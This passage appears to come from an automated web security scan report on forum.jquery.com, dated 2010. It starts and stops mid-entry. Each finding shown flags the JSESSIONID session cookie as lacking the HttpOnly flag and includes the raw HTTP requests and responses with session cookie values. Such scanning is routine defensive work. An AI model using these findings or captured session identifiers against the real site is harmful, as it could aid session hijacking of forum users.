Cookie: trac_session=ef3b3632c1eb2698d8a6210a; trac_form_token=92628968b66cfc1a686b73e2; __utmz=119074714.1289873044.1.1.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=119074714.56097933.1289873044.1289873044.1289873044.1; __utmc=119074714; __utmb=119074714.1.10.1289873044;

Response

HTTP/1.1 200 Ok
Server: nginx/0.7.65
Date: Tue, 16 Nov 2010 02:34:42 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Cache-Control: must-revalidate
Content-Length: 12043
Set-Cookie: trac_form_token=fb447b3831e75a8e953d1043; Path=/
Set-Cookie: trac_session=7449c302e08b5599f25f977d; expires=Mon, 14-Feb-2011 02:34:39 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<!-- overrides theme.html -->


<h
...[SNIP]...

2.2. http://forum.jquery.com/about-the-jquery-forum

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /about-the-jquery-forum

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about-the-jquery-forum HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=5B7FED8F2238C535DF4F28A8A27FB530; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:32:27 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...

2.3. http://forum.jquery.com/about-the-jquery-forum/feed

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /about-the-jquery-forum/feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about-the-jquery-forum/feed HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=873A51D3AEF828D67511A5ECABECAF02; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:31:57 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...

2.4. http://forum.jquery.com/developing-jquery-core/feed

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /developing-jquery-core/feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /developing-jquery-core/feed HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=6C3C3DACDDB447B425357999305AC82B; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:55 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...

2.5. http://forum.jquery.com/developing-jquery-mobile

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /developing-jquery-mobile

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /developing-jquery-mobile HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=BE61E18B27FEA85612DE309D854DEEBD; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:07 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...

2.6. http://forum.jquery.com/developing-jquery-mobile/feed

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /developing-jquery-mobile/feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /developing-jquery-mobile/feed HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=42A9B18DCA94367EB89AE1F90A3E8A5E; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:33:31 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...

2.7. http://forum.jquery.com/developing-jquery-plugins

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /developing-jquery-plugins

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /developing-jquery-plugins HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=31A3A3697572135978EA43A4B3445CA3; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:31:26 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...

2.8. http://forum.jquery.com/developing-jquery-plugins/feed

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /developing-jquery-plugins/feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /developing-jquery-plugins/feed HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=BA6932EA2617342EA339D66B2AF60194; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:59 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...

2.9. http://forum.jquery.com/developing-jquery-ui/feed

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /developing-jquery-ui/feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /developing-jquery-ui/feed HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=E31E96CCF256172436993DEA1F835E6B; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:31:25 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...

2.10. http://forum.jquery.com/jquery-conferences

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /jquery-conferences

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jquery-conferences HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=E9EAA61A3D158993FEA0827C700963BF; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:32:54 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...

2.11. http://forum.jquery.com/jquery-conferences/feed

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /jquery-conferences/feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jquery-conferences/feed HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=40FF9D5D8C2F7ABAE6ABFBC5F54B4EDD; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:32:29 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...

2.12. http://forum.jquery.com/jquery-mobile

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /jquery-mobile

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jquery-mobile HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=146CD0CCDD0B8E3BD799AAF98F5C892D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:33:29 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...

2.13. http://forum.jquery.com/jquery-mobile/feed

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /jquery-mobile/feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jquery-mobile/feed HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=8695160D9955B3EC9559107E265FC5FC; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:32:54 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...

2.14. http://forum.jquery.com/jsp/i18nConstants.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /jsp/i18nConstants.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsp/i18nConstants.jsp HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=DC8A5909B0D933EC59A3C84884479B5E; __utmz=44433727.1289873270.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.119885522.1289873270.1289873270.1289873270.1; __utmc=44433727; __utmb=44433727.2.10.1289873270; zdccn=d6441e45-f0c8-4f7a-8a60-69a4d49095ae;

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=E1E47BDD097BA4D9D3A2A85F540B8999; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Tue, 16 Nov 2010 02:34:39 GMT
Server: Apache-Coyote/1.1
Connection: close


2.15. http://forum.jquery.com/qunit-and-testing

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /qunit-and-testing

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /qunit-and-testing HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=E5466414448844E9BCAEB960C7DE0267; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:31:56 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...

2.16. http://forum.jquery.com/qunit-and-testing/feed

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /qunit-and-testing/feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /qunit-and-testing/feed HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=BB93452B50B14E4513ACB35739034DED; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:31:30 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...

2.17. http://forum.jquery.com/sendFeedback.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /sendFeedback.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sendFeedback.do HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 500 POST_ONLY_URL
Set-Cookie: JSESSIONID=A6EDE9A48A2F661EC4A127FE0509A508; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 16 Nov 2010 02:34:38 GMT
Server: Apache-Coyote/1.1
Connection: close


<link href="/styles/errorpage.css" rel="stylesheet" type="text/css"/>

<title>Requested url not found</title>
<div class="errorpagemain">
<div class="headerArea">
   <div class="headerAre
...[SNIP]...

2.18. http://forum.jquery.com/subscribeRegister.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /subscribeRegister.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /subscribeRegister.do HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=50010F8418F40C3040264512D399D885; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Tue, 16 Nov 2010 02:34:34 GMT
Server: Apache-Coyote/1.1
Connection: close


2.19. http://forum.jquery.com/topic/how-can-i-help-9-5-2010

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /topic/how-can-i-help-9-5-2010

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /topic/how-can-i-help-9-5-2010 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=ECE9699A2EDA73BBD1A86295BA681CEC; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:40 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...

2.20. http://forum.jquery.com/topic/looking-for-help-on-panel-development

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /topic/looking-for-help-on-panel-development

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /topic/looking-for-help-on-panel-development HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=824525F306F33D1A660A41D747B3C3C5; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:19 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...

2.21. http://forum.jquery.com/uploadImage.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /uploadImage.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /uploadImage.do HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 500 POST_ONLY_URL
Set-Cookie: JSESSIONID=DD4C43763F4EDFA92007DB02C656454B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 16 Nov 2010 02:34:38 GMT
Server: Apache-Coyote/1.1
Connection: close


<link href="/styles/errorpage.css" rel="stylesheet" type="text/css"/>

<title>Requested url not found</title>
<div class="errorpagemain">
<div class="headerArea">
   <div class="headerAre
...[SNIP]...

2.22. http://forum.jquery.com/user/andrew_powell

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /user/andrew_powell

Issue detail

